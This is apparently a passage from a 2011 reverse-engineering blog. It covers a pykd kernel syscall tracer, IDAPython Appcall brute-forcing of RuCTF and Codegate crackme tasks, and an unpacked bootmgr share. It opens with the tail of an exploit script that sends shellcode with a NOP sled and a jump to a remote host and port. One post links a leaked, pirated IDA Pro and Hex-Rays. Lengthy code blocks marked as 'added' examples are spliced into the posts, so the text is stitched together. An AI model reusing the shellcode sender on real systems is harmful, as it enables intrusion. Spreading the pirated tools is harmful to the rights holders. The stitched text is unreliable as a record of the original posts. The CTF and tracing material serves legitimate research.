<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>f3<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>06<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>eb<span style="color: #000099; font-weight: bold;">\x</span>99"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>90"</span><span style="font-size: small;"> </span><span style="color: #66cc66; font-size: small;">*</span><span style="font-size: small;"> </span><span style="color: black; font-size: small;">(</span><span style="color: orangered; font-size: small;">261</span><span style="font-size: small;"> - </span><span style="color: green; font-size: small;">len</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">shell</span><span style="color: black; font-size: small;">)</span><span style="color: black; font-size: small;">)</span><br />
<span style="color: #ff7700; font-size: small; font-weight: bold;">print</span><span style="font-size: small;"> </span><span style="color: green; font-size: small;">len</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">shell</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>e9<span style="color: #000099; font-weight: bold;">\x</span>f7<span style="color: #000099; font-weight: bold;">\x</span>fe<span style="color: #000099; font-weight: bold;">\x</span>ff<span style="color: #000099; font-weight: bold;">\x</span>ff"</span><br />
<span style="font-size: small;">sock = </span><span style="color: crimson; font-size: small;">socket</span><span style="font-size: small;">.</span><span style="color: crimson; font-size: small;">socket</span><span style="color: black; font-size: small;">(</span><span style="color: crimson; font-size: small;">socket</span><span style="font-size: small;">.</span><span style="color: black; font-size: small;">AF_INET</span><span style="font-size: small;">, </span><span style="color: crimson; font-size: small;">socket</span><span style="font-size: small;">.</span><span style="color: black; font-size: small;">SOCK_STREAM</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">connect</span><span style="color: black; font-size: small;">(</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">HOST, PORT</span><span style="color: black; font-size: small;">)</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">str1 = </span><span style="color: darkslateblue; font-size: small;">'+'</span><span style="font-size: small;">+ shell + </span><span style="color: darkslateblue; font-size: small;">"|<span style="color: #000099; font-weight: bold;">\n</span>"</span><br />
<span style="color: #ff7700; font-size: small; font-weight: bold;">print</span><span style="font-size: small;"> str1</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">send</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">str1</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">str2 = </span><span style="color: darkslateblue; font-size: small;">'-'</span><span style="font-size: small;">+ shell + </span><span style="color: darkslateblue; font-size: small;">"|<span style="color: #000099; font-weight: bold;">\n</span>"</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">send</span><span style="color: black; font-size: small;">(</span><span style="font-size: small;">str2</span><span style="color: black; font-size: small;">)</span><br />
<span style="font-size: small;">sock.</span><span style="color: black; font-size: small;">close</span><span style="color: black; font-size: small;">(</span><span style="color: black; font-size: small;">)</span></div></span><br />
</span><br />
<br />
</span></div>
<hr /><div style="text-align: center;"><b>PykdTrace</b> (2011-07-20)</div><hr />
Ciss Hot Summer offers a lot of different things to do, but I chose bug hunting and trace building.<br />
Some researchers build traces with Temu, some use debuggers such as MyNav or ProcessStalker. But for kernel work, as you know, we need WinDbg. Its big advantage is that WinDbg works everywhere. <br />
It's no secret that kernel researchers use WinDbg for rootkit hunting and analysis. You can find a lot of scripts in the <a href="http://kdar.codeplex.com/">KDAR</a> project. <br />
But WinDbg scripting is not comfortable, so the <a href="http://pykd.codeplex.com/">pykd</a> project was born.<br />
Today I would like to present a small overview of pykd and <a href="https://github.com/antoxar/pykd_trace">my own script</a> for tracing syscalls.<br />
<span class="fullpost"><br />
<div dir="ltr" style="text-align: left;" trbidi="on"><span class="fullpost">Let's start with installation. I could only install the version for Python 2.7. The other version didn't work on my Windows (it doesn't work with any VCRedist).</span><br />
<span class="fullpost">If you install it from the setup package you already have several examples. If you install only the *.pyd file, download them, because the documentation on the project site is sparse. It's time for some experiments.</span><br />
<blockquote><span class="fullpost"><span class="fullpost"><i><span style="font-family: 'Courier New',Courier,monospace;">.load pykd.pyd</span></i> - loads the extension into WinDbg.</span></span></blockquote><blockquote><span class="fullpost"><span class="fullpost"><i><span style="font-family: 'Courier New',Courier,monospace;">!py name.py</span></i> – starts a script. Don't forget to set PYTHONPATH, because otherwise dependencies will not be found.</span></span></blockquote><span class="fullpost"><span class="fullpost"> Have fun? …<br />
As with any debugger-based tracer, it's necessary to set breakpoints and handle them. Pykd has a bp class. The handler must return DEBUG_STATUS_GO or DEBUG_STATUS_GO_HANDLER, to continue or to stop execution respectively.<br />
</span></span><br />
<blockquote><div class="python"><span class="fullpost"><span class="fullpost">bp( nt.DbgPrint, Handler)</span></span></div></blockquote><span class="fullpost"><span class="fullpost">Then you should call go() in your script; pykd sets the bp only immediately after start.<br />
The next task is monitoring process creation and the created process's children. There are many ways to do it, but I'd like to hook PspInsertProcess and PspProcessDelete. These functions append an EPROCESS to, and remove it from, PsActiveProcessList. In my script I create a BPHandler class which contains the handlers for the process and syscall bps. The syscall bps are enabled once the process named &lt;process_name&gt; has started. For this purpose pykd has the typedVar class. <br />
</span></span><br />
<blockquote><div class="python"><span class="fullpost"><span class="fullpost">eprocess = typedVar("nt", "_EPROCESS", reg("eax"))</span></span></div></blockquote><span class="fullpost"><span class="fullpost">And you can use eprocess like a structure: eprocess.UniqueProcessId. <br />
In the syscall handler we need to get the eprocess too. In this case I'd like to show you another command, dbgCommand:<br />
</span></span><br />
<blockquote><div class="python"><span class="fullpost"><span class="fullpost">def GetCurrentProcess(self):</span></span><br />
<span class="fullpost"><span class="fullpost">    # x86: fs:[0x124] is the current KTHREAD, +0x50 its owning process; let the debugger evaluate it</span></span><br />
<span class="fullpost"><span class="fullpost">    out = dbgCommand(".printf \"%x\n\", poi(poi(fs:[0x124])+0x50)")</span></span><br />
<span class="fullpost"><span class="fullpost">    return int(out, 16)</span></span></div></blockquote><span class="fullpost"><span class="fullpost">Start the script </span></span></div><div style="font-family: 'Courier New',Courier,monospace; text-align: left;"><span class="fullpost"><i><span class="fullpost">!py pykdtrace.py dropper</span></i></span></div><div><span class="fullpost"><span class="fullpost">and any droppers in VMware, and go to sleep. <br />
</span></span><br />
<blockquote><span class="fullpost"><span class="fullpost">f60:nt!NtAlpcConnectPort</span></span><br />
<span class="fullpost"><span class="fullpost">f9c:nt!NtAllocateVirtualMemory</span></span><br />
<span class="fullpost"><span class="fullpost">f9c:nt!NtAllocateVirtualMemory</span></span><br />
<span class="fullpost"><span class="fullpost">f9c:nt!NtAllocateVirtualMemory</span></span></blockquote><span class="fullpost"><span class="fullpost">Wake up and see a big log file. I'm using the syscall results for some metamorphic experiments, but they can be used for tracing drivers and so on. Change the GetSyscallList function to get another bp list for your purpose.<br />
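The log lines above are the raw material of the trace. As an added example, not part of the post or of pykd, here is an offline analyzer for that pid:module!syscall format: it parses the lines, builds a per-process histogram, run-length encodes each process's syscall stream (the three NtAllocateVirtualMemory lines collapse into one entry) and matches an ordered subsequence against it. The sample log and the triage pattern are constructed for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the tracer's log format "<pid hex>:<module>!<syscall>".
# The first four lines are the ones shown in the post; the rest are made up for this example.
SAMPLE_LOG = """\
f60:nt!NtAlpcConnectPort
f9c:nt!NtAllocateVirtualMemory
f9c:nt!NtAllocateVirtualMemory
f9c:nt!NtAllocateVirtualMemory
f9c:nt!NtWriteVirtualMemory
f9c:nt!NtCreateThreadEx
f60:nt!NtAlpcSendWaitReceivePort
this line is malformed on purpose and must be skipped
"""

LINE_RE = re.compile(r'^([0-9a-fA-F]+):(\w+)!(\w+)\s*$')

def parse_trace(text):
    """Return (pid, syscall_name) tuples in log order; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((int(m.group(1), 16), m.group(3)))
    return events

def per_process_counts(events):
    """Syscall histogram per PID: {pid: Counter({name: count})}."""
    counts = defaultdict(Counter)
    for pid, name in events:
        counts[pid][name] += 1
    return dict(counts)

def collapsed_sequence(events, pid):
    """Run-length encode one process's syscall stream as [(name, repeats), ...]."""
    seq = []
    for p, name in events:
        if p != pid:
            continue
        if seq and seq[-1][0] == name:
            seq[-1] = (name, seq[-1][1] + 1)
        else:
            seq.append((name, 1))
    return seq

# Constructed triage pattern: three calls, in this order, that a trace reviewer
# would want flagged for a closer look.
PATTERN = ('NtAllocateVirtualMemory', 'NtWriteVirtualMemory', 'NtCreateThreadEx')

def matches_pattern(seq, pattern=PATTERN):
    """True if `pattern` occurs in `seq` as an ordered, not necessarily adjacent, subsequence."""
    i = 0
    for name, _ in seq:
        if i < len(pattern) and name == pattern[i]:
            i += 1
    return i == len(pattern)

def flagged_pids(text, pattern=PATTERN):
    """Sorted PIDs whose collapsed syscall stream contains the pattern."""
    events = parse_trace(text)
    pids = {pid for pid, _ in events}
    return sorted(pid for pid in pids
                  if matches_pattern(collapsed_sequence(events, pid), pattern))

if __name__ == '__main__':
    ev = parse_trace(SAMPLE_LOG)
    for pid, hist in sorted(per_process_counts(ev).items()):
        print(hex(pid), dict(hist))
    print('flagged:', [hex(p) for p in flagged_pids(SAMPLE_LOG)])
```

Run-length encoding before matching keeps repeated allocations from inflating the sequence, and the subsequence match tolerates unrelated syscalls in between, which is what a real trace of a loader looks like; swap PATTERN for whatever your own bp list is meant to catch.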
<br />
Looks pretty simple. But I have a few remarks:<br />
</span></span><br />
<ul style="text-align: left;"><li><span class="fullpost"><span class="fullpost">Pykd doesn't show me Python exceptions (print via the debug engine works fine; it makes me crazy).</span></span></li>
<span class="fullpost">
<li><span class="fullpost">Pykd doesn't call the destructor of any class (so it doesn't delete the bps and doesn't close the file when I stop it with an initial break).</span></li>
<li><span class="fullpost">Pykd is a slow engine for tracing purposes, but for rootkit hunting it's a really good thing.</span></li>
</span></ul><span class="fullpost"><span class="fullpost"> <br />
My next experiment with kernel tracing will use IDA and some IoCtl handler. <br />
<br />
Good Luck.<br />
<br />
P.S. I thought that the Windows driver for Temu was big. My mistake. You can find one for Win 7, by a Linux driver developer, in the <a href="https://github.com/olshanov/temu_testdrv_win7">Olshanov repository</a>. <br />
</span></span></div></span>
<hr /><div style="text-align: center;"><b>IDA Pro 6.1 + HexRays 1.5 leaked</b> (2011-07-13)</div><hr />
The long-awaited leak.<br />
<span class="fullpost"><br />
IDA Pro 6.1 + HexRays 1.5 leaked: <a href="http://t.co/EXqytpT">http://t.co/EXqytpT</a> (sendspace.com). <br />
Epic story: <a href="http://t.co/n7awBas">http://t.co/n7awBas</a> (rus)<br />
</span>
<hr /><div style="text-align: center;"><b>Unpacked bootmgr x86 part</b> (2011-06-02)</div><hr />
<div dir="ltr" style="text-align: left;" trbidi="on">Unpacked <a href="https://docs.google.com/leaf?id=0Bw72cstp5cGsMzcwZGZjMmEtOWQ1YS00ZThhLWJjN2MtMmM3NmEyNjA3OTY1&hl=ru&authkey=CImPpPMB">bootmgr</a><span class="fullpost"><br />
The first 5 sections are correct. The other segments are wrong, but IDA can still associate it with the pdb.</span><br />
<br />
<span class="fullpost">This version was checked against Win 7 SP0. You can also find a free version, or ask me. </span><br />
<span class="fullpost">Also there are small differences after ms-advisory-2506014-x64. </span></div>
<hr /><div style="text-align: center;"><b>IDAPython and CTF Task</b> (2011-04-12)</div><hr />
<span lang="EN-US">A few months ago I read the post "IDA + Python = Love" in "Hacker" magazine and was a bit pissed off, because it is a translation from <a href="http://www.blogger.com/goog_1221386706" style="color: black;">HexBlog </a></span><span class="author"><span lang="EN-US">and didn't mention another cool IDAPython feature, <a href="http://www.hexblog.com/?p=113" style="color: black;">Appcall</a>, which appeared in IDA 5.6. Here is the <a href="http://www.hex-rays.com/idapro/debugger/appcall.pdf" style="color: black;">user guide</a>.</span></span><br />
<blockquote>Appcall is a mechanism used to call functions inside the debugged program from the debugger or your script as if it were a built-in function. </blockquote>So you don't need <a href="http://docs.python.org/library/ctypes.html" style="color: black;">ctypes</a> for simple operations.<br />
<br />
<div style="font-family: Georgia,'Times New Roman',serif;"><b><span lang="EN-US" style="font-size: small;">Today I will show how you can use this technique in different CTF tasks with the IDA 6.0 demo. </span></b></div><br />
<span class="fullpost"><br />
<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><hr /><div style="text-align: center;"><b>RuCTF2009 Quals Reverse 100</b></div><hr /><br />
<span lang="EN-US">In every CTF quals we get an interesting reverse task involving brute force. Let's take </span><a href="http://ructf.org/2009/documentation/quals/81.xml">reverse 100</a> from RuCTF quals 2009.<br />
<span lang="EN-US"></span><br />
<span lang="EN-US">It was a pretty simple binary with a string-checking function.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0M-ikq4D6u6Yp7EppkvGiGT8_ddZUPlx75PdO_7QgiJ3toYAA1MWFKUaALVBwdnGH98GibmPQD49yOQI35yVgs-f2IfoHg2vdrQQCIJ96FEGOskS_5xZjuUcD73l9pcYZywtE9B0EZRo/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0M-ikq4D6u6Yp7EppkvGiGT8_ddZUPlx75PdO_7QgiJ3toYAA1MWFKUaALVBwdnGH98GibmPQD49yOQI35yVgs-f2IfoHg2vdrQQCIJ96FEGOskS_5xZjuUcD73l9pcYZywtE9B0EZRo/s1600/Capture.JPG" /></a></div><div align="center" style="text-align: center;"><br />
<span lang="EN-US"></span></div>First of all, start the debugger and open the Python command line.<br />
<ol style="text-align: left;"><li>Initialize the Appcall object: find the function by name and attach its prototype.</li>
<li>Find the string pointer with the IDC <span style="color: #b45f06;">LocByName</span> function and patch it with <span style="color: #b45f06;">PutDataList</span>.</li>
<li>Initialize the permutation object and start the script.</li>
</ol><div class="python">import string<br />
from idaapi import Appcall<br />
from idautils import PutDataList<br />
from idc import LocByName<br />
from itertools import product<br />
<br />
brute = Appcall.proto("brute_f", "int __cdecl brute_f();")<br />
<br />
def patchString(val):<br />
    # write the candidate's bytes over the 'string' symbol in the debuggee<br />
    PutDataList(LocByName('string'), map(ord, val))<br />
<br />
for i in xrange(3):<br />
    for s in product(string.letters + string.digits, repeat=i):<br />
        patchString(s)<br />
        if brute() == 1:<br />
            print ''.join(s)</div></div><br />
In the output window you can see the results:<br />
<blockquote><b>aF nh oY p4 rV sg D5 FW Gf HH Iy Tv UG Zi 18 2k 3Z</b></blockquote><br />
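The same search, written as an added example (not the post's own script) so that the brute-force driver is separated from the IDA calls: the candidate generator and the field encoding run anywhere, and only make_ida_check touches IDA, through the same Appcall.proto, PutDataList and LocByName calls the post uses. The field_len value and the NUL padding are assumptions of this example; the post writes only the candidate's bytes.

```python
import string
from itertools import product

# Same alphabet as the post's string.letters + string.digits (Python 3 spelling).
ALPHABET = string.ascii_letters + string.digits

def candidates(alphabet=ALPHABET, min_len=1, max_len=2):
    """Yield every string over `alphabet` with length in [min_len, max_len], shortest first."""
    for n in range(min_len, max_len + 1):
        for chars in product(alphabet, repeat=n):
            yield ''.join(chars)

def encode_candidate(text, field_len):
    """Bytes to write into the target's fixed-size string field: the candidate, a NUL
    terminator and zero padding, so a shorter candidate never leaves stale bytes behind.
    field_len is an assumed size for the field; take the real one from the binary."""
    raw = text.encode('ascii')
    if len(raw) >= field_len:
        raise ValueError("candidate does not fit in the field with its terminator")
    return list(raw) + [0] * (field_len - len(raw))

def brute_force(check, field_len=16, alphabet=ALPHABET, min_len=1, max_len=2):
    """Run `check(byte_list)` over every candidate and return the accepted strings.
    `check` is whatever writes the bytes into the target and asks it to validate them."""
    return [c for c in candidates(alphabet, min_len, max_len)
            if check(encode_candidate(c, field_len))]

def make_ida_check(string_sym='string', func_sym='brute_f'):
    """Build the check used inside IDA: patch the bytes at `string_sym` with PutDataList
    and call brute_f through Appcall, as the post does. The imports are deferred so this
    module also loads outside IDA; the symbol names are the task's own."""
    from idaapi import Appcall
    from idautils import PutDataList
    from idc import LocByName
    brute = Appcall.proto(func_sym, 'int __cdecl brute_f();')
    ea = LocByName(string_sym)

    def check(data):
        PutDataList(ea, data)
        return brute() == 1
    return check

if __name__ == '__main__':
    # Inside IDA (debugger running) this reproduces the post's search.
    for hit in brute_force(make_ida_check()):
        print(hit)
```

Keeping the driver pure means the search order, alphabet and length bounds can be unit-tested on the host, and the only code that needs the debugger is the three-line check closure.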
<hr /><div style="text-align: center;"><b>RuCTF2009 Quals Reverse 200</b></div><hr /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkLTgRYQU15xaWvk_j2pleN0DKJ7Y71w2wSvMSJYD5WEU-mLj4X1VU92nUtM8h6c8ILvHrtSpMAISssaXDNkjuw3_zb2YxNgIzxVER0yRqbbhfrsFb8dCWPVGUaYMIq0Mw-V6pUU0peP4/s1600/Capture.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkLTgRYQU15xaWvk_j2pleN0DKJ7Y71w2wSvMSJYD5WEU-mLj4X1VU92nUtM8h6c8ILvHrtSpMAISssaXDNkjuw3_zb2YxNgIzxVER0yRqbbhfrsFb8dCWPVGUaYMIq0Mw-V6pUU0peP4/s200/Capture.JPG" width="200" /></a></div> <br />
Another example: it's necessary to call some function with different parameters. Look at <span lang="EN-US"><a href="http://ructf.org/2009/documentation/quals/81.xml" style="color: black;"> reverse 200</a> in RuCTF quals 2009. </span><span lang="EN-US">We have the hex string </span><b>0408151623426C12 </b>and a DLL. Find the upper function in graph mode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGxpIDaNm-X057QzQ5_hxk4ty_1ypUoiLydAUDkJRBNkBybbo4Vfb-8oer0bMFL16V5q5dbek5U7dNn-8_IiHYO3bc4SunzMdfSMIYYIhuHSPOywqiqg6SFCC3TnRmd0IlN4srD6XwH0I/s1600/Capture.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGxpIDaNm-X057QzQ5_hxk4ty_1ypUoiLydAUDkJRBNkBybbo4Vfb-8oer0bMFL16V5q5dbek5U7dNn-8_IiHYO3bc4SunzMdfSMIYYIhuHSPOywqiqg6SFCC3TnRmd0IlN4srD6XwH0I/s1600/Capture.JPG" /></a></div><br />
<br />
<br />
If you have Hex-Rays (or IDA 5.5) you can decompile it and get the function prototype. Here it is:<br />
<blockquote><i>int __fastcall func(char *, char *, char *);</i></blockquote>The calling convention must be present in the prototype.<br />
<br />
<span style="color: #b45f06;"><span style="color: black;">As in the last example:</span></span><br />
<ol style="text-align: left;"><li>initialize the Appcall object,</li>
<li>create the input and output buffers,</li>
<li>call the function.</li>
</ol><br />
<div class="python">test = Appcall.proto("func", "int __fastcall func(char *, char *, char *);")<br />
bufin = Appcall.buffer("\x04\x08\x15\x16\x23\x42\x6C\x12")<br />
buffout1 = Appcall.buffer("\x00" * 15)<br />
buffout2 = Appcall.buffer("\x00" * 15)<br />
test(bufin, buffout1, buffout2)<br />
print buffout1.value.encode('hex')</div></div><br />
Result: <b>69da2403d2416d3c8042625839d400 </b><br />
<br />
<br />
<hr /><div style="text-align: center;"><b>Codegate 2011 Quals Issue 500 </b></div><hr /><br />
Since I became interested in Windows boot code, I use Bochs for all my research. Bochs support in IDA starts from version 5.4. IDA 5.5 works only with Bochs 2.3.7, because it can't get register information from newer versions. IDA 6.0 with the IDA 5.5 Bochs plugins works fine with 2.4.5.<br />
<br />
I didn't solve this task during the CTF, but I have one interesting solution method. You can read a detailed write-up on the <a href="http://leetmore.ctf.su/wp/codegate-ctf-2011-issue-500-bootsector/">Leet More blog</a>.<br />
<br />
First of all, let's make a bochsrc file for issue500.bin.<br />
I already have <a href="https://docs.google.com/leaf?id=0Bw72cstp5cGsZTExYTgxMGItOWFlMS00YzIyLTkyMWYtYjg5ZDAzMTZhOGEy&hl=ru&authkey=CLLphJcM">one</a>. This example works fine in 2.4 and 2.3. For your purposes, only modify this line as you need:<br />
<br />
<blockquote><div class="python"><div style="text-align: left;">ata0-master: type=disk, mode=flat, translation=auto, path="$CODEGATE\iss500\issue500.bin", cylinders=6500, heads=255, spt=63, biosdetect=auto, model="test" </div></div></blockquote><br />
The next step is starting IDA with Bochs. Unfortunately I don't have a full IDA version newer than 5.5, and so can't use Appcall. The IDA 6.0 demo shows me this screen. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU3Fzqxbivx5vzkeB4pSblwkqG5hyphenhyphenO8sTkWuQIyWLiH4UomRPwavmCvAkA-xfK3sgk8vfTBVL-Kek52KlQkMeEo-_gwUl7_-cekeidZzwJR0e_Mzb1AoBmlF1paOPnRDjKeLQIW5aoiSg/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU3Fzqxbivx5vzkeB4pSblwkqG5hyphenhyphenO8sTkWuQIyWLiH4UomRPwavmCvAkA-xfK3sgk8vfTBVL-Kek52KlQkMeEo-_gwUl7_-cekeidZzwJR0e_Mzb1AoBmlF1paOPnRDjKeLQIW5aoiSg/s320/Capture.JPG" width="320" /></a></div><br />
So in this section I will talk about IDA 5.5; if you have a newer version, PLEASE check Appcall with 16-bit code. I hope it works fine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYqWxZaDUvFOUBsSEjCRJbFEM8BGOn3IlnBx5rgcLDjypVZKExtUwULJ5_vrGR62u7jZIkRQlmSTn0XeRuyJz1_0wSY8juwmXN3ORMgcpCMmyzMIV2NchmZuN3uafN_-RThE0E65g5H0/s1600/Capture.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYqWxZaDUvFOUBsSEjCRJbFEM8BGOn3IlnBx5rgcLDjypVZKExtUwULJ5_vrGR62u7jZIkRQlmSTn0XeRuyJz1_0wSY8juwmXN3ORMgcpCMmyzMIV2NchmZuN3uafN_-RThE0E65g5H0/s320/Capture.JPG" width="320" /></a></div><br />
Start IDA. In the main menu choose Debugger->Run->Local Bochs Debugger.<br />
In the next window give the full path to the *.bxrc file.<br />
The next step is "Debug options->Set specific options":<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Y0bgLlIWz3bVoCs39L2pR0hefkdz4IArdoaZyP7sSv_hBCw9VD8mdbzt4xCzOpYzNZG_mbbCMifeVGtDF0-qPo9psnAw_tTPjUoNE4ijYNuLbNt-tFcDsIOAlNvu-VH2Ezp8bBZ6OQg/s1600/Capture.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Y0bgLlIWz3bVoCs39L2pR0hefkdz4IArdoaZyP7sSv_hBCw9VD8mdbzt4xCzOpYzNZG_mbbCMifeVGtDF0-qPo9psnAw_tTPjUoNE4ijYNuLbNt-tFcDsIOAlNvu-VH2Ezp8bBZ6OQg/s320/Capture.JPG" width="320" /></a></div>Set the full path to bochsdbg.exe and choose Disk image.<br />
Those are all the settings we need. Start the debugger and wait until IDA creates the database. Bochs then complains about bad disk geometry; press continue. The image asks you for a password. Look at the call stack and find the "debug#" segment, put a breakpoint right after the "int" instruction and press Enter.<br />
<br />
Now you are in the password input function, and just below it is the password checker. In the picture you can see this simple function, which is called for each symbol. DX starts from 0 and after all symbols it must equal 0x2002.<br />
You can reimplement the algorithm in Python or C, but it is cooler to brute-force it from the debugger.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzvYEOaBO3XQXyRTHmM5eAkw5cox3M9eAjY0z4tUzgFf3I4ZQLW3lnHHl4MYcJ6ME2V03hiC3sxQ6xqiaheLDoaAKS3yiqzG22-ySs1Z263CXzki_w_1Z3upRf3ehEM5Or0SjKpnvuosI/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzvYEOaBO3XQXyRTHmM5eAkw5cox3M9eAjY0z4tUzgFf3I4ZQLW3lnHHl4MYcJ6ME2V03hiC3sxQ6xqiaheLDoaAKS3yiqzG22-ySs1Z263CXzki_w_1Z3upRf3ehEM5Or0SjKpnvuosI/s1600/Capture.JPG" /></a></div>Please check it in a newer version of IDA and let me know.<br />
<br />
<br />
<hr /><div style="text-align: center;"><b>RuCTF 2011 Quals Reverse 300 </b></div><hr /><br />
A really crazy brute-force task. I will show the script for my first idea about it. In short, we have a binary that wants a 10-symbol string satisfying the checks of sub_40181A (renamed brute_f). This function checks the input string against a table starting at 0x403182. The indexing into this dictionary drove me crazy, so I wrote a script that runs the function backwards: take the final value, 0xD4, find it in the dictionary, work out which row and column it sits in (the row is the previous value, the column is the input symbol), then search for that previous value, and so on.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkLTgRYQU15xaWvk_j2pleN0DKJ7Y71w2wSvMSJYD5WEU-mLj4X1VU92nUtM8h6c8ILvHrtSpMAISssaXDNkjuw3_zb2YxNgIzxVER0yRqbbhfrsFb8dCWPVGUaYMIq0Mw-V6pUU0peP4/s1600/Capture.JPG" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br />
</a></div></div></div><br />
<div class="python"><pre>
# IDAPython (IDA 5.x/6.x API): run sub_40181A (brute_f) backwards through the table at "dict".
# Table layout: rows of NCOLS two-byte entries, row = previous value, column = input symbol.
start = "D4"                      # final value the checker expects (hex string for FindBinary)
outstr = ""
strOld = "23456789TJQKAhscd "     # input alphabet: column i of a row is symbol strOld[i]
NCOLS = 0x13                      # 19 two-byte entries per row (the alphabet above has 18 symbols)
start_offset = LocByName("dict")  # table base, 0x403182
for step in range(0xa):           # 10 input symbols
    # first occurrence of the current value in the table, as an offset from the base
    offset = FindBinary(start_offset, SEARCH_DOWN, start) - start_offset
    print("VA %x RVA %x" % (offset + start_offset, offset))
    for i in range(NCOLS):
        # offset = row * (NCOLS * 2) + column * 2, so recover the row for column i
        val = (offset - i * 2) // (NCOLS * 2)
        if val * (NCOLS * 2) + i * 2 == offset:
            print(hex(i) + " '" + strOld[i] + "' " + hex(ord(strOld[i])) + " --> " + hex(val))
            start = "%02x" % val  # the row number is the previous value: search for it next
            outstr += strOld[i]   # symbols come out last-to-first, so reverse outstr at the end
            break
print(outstr)
</pre></div><br />
I get a string like <b>h2 h2h2 h2</b>; reversed it is 2h 2h2h 2h. Feeding that to the program gives only a 50% match, because the script takes just the first occurrence of each value in the table.<br />
To check the other possible variants, call the checker itself through Appcall with a construction like this (val_4d is the global at 0x40317E that receives the final value):<br />
<div class="python"><pre>
# Call the checker inside the debugged process through Appcall (IDA 5.5+ with the debugger attached)
brute = Appcall.proto("brute_f", "int __cdecl brute_f();")

def check(candidate):
    # overwrite the global input buffer "string" with the 10-symbol candidate
    PutDataList(LocByName("string"), [ord(c) for c in candidate])
    brute()
    # val_4d (0x40317E) receives the final table value; 0xD4 means the string passed
    return Dword(LocByName("val_4d")) == 0xd4

if check("2h 2h2h 2h"):
    print("OK")
</pre></div><br />
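The script above stops at the first place each value occurs in the table, which is why it recovers only part of the string. Below is an added Python example, not the page's script and not the task binary: it models the table layout the script assumes (rows of two-byte little-endian entries, row = previous value, column = position of the input symbol in the alphabet) over a constructed table, implements the forward check the way brute_f is described, and then walks the table backwards through every occurrence of each value, lazily, until a 10-symbol string is found that starts from the assumed initial value. The initial value 0, the table contents and the column count (the script hard-codes 0x13; the alphabet on the page has 18 symbols, which this example uses) are assumptions; the real table at 0x403182 is not on the page.<br />

```python
import struct

# Layout assumed from the page's script: rows of NCOLS two-byte little-endian entries,
# row = current value, column = index of the input symbol in ALPHABET.
ALPHABET = "23456789TJQKAhscd "      # symbol order taken from the page's script
NCOLS = len(ALPHABET)                 # the page's script hard-codes 0x13 here
ENTRY = 2                             # bytes per table entry
NROWS = 256
INIT_STATE = 0                        # assumption: the checker starts from value 0
PASS_LEN = 10


def build_table(nrows=NROWS):
    """Constructed stand-in for the table at 0x403182 (not the real one)."""
    cells = [(state * 53 + col * 97 + 11) % nrows
             for state in range(nrows) for col in range(NCOLS)]
    return struct.pack("<%dH" % len(cells), *cells)


TABLE = build_table()


def forward(s, table=TABLE, init=INIT_STATE):
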